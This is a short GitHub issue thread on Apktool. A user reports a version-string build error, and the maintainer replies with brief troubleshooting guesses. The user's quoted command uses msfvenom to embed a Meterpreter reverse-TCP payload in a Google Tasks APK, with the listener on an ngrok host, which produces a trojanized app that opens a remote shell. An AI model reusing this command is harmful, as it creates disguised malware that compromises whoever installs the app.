### ISSUE TITLE
Error: Malformed version number string 2.5.0-dirty 32 bit support is deprecated. Apktool will not support 32bit on v2.6.0.

### ISSUE THREAD

**Issue by hemant98175** [iBotPeaches/Apktool#2775]
While creating apk using apktool i'm getting an error

**Code:-**
sudo msfvenom -x google_tasks.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=5988 -o output.apk

**Error:-**
Error: Malformed version number string 2.5.0-dirty
32 bit support is deprecated. Apktool will not support 32bit on v2.6.0.

**Comment by iBotPeaches** [comment]
Not sure, it looks like:

 * version is old
 * msfvenom runs a dirty version, no idea what
 * 32bit is deprecated
 
 Not enough detials.
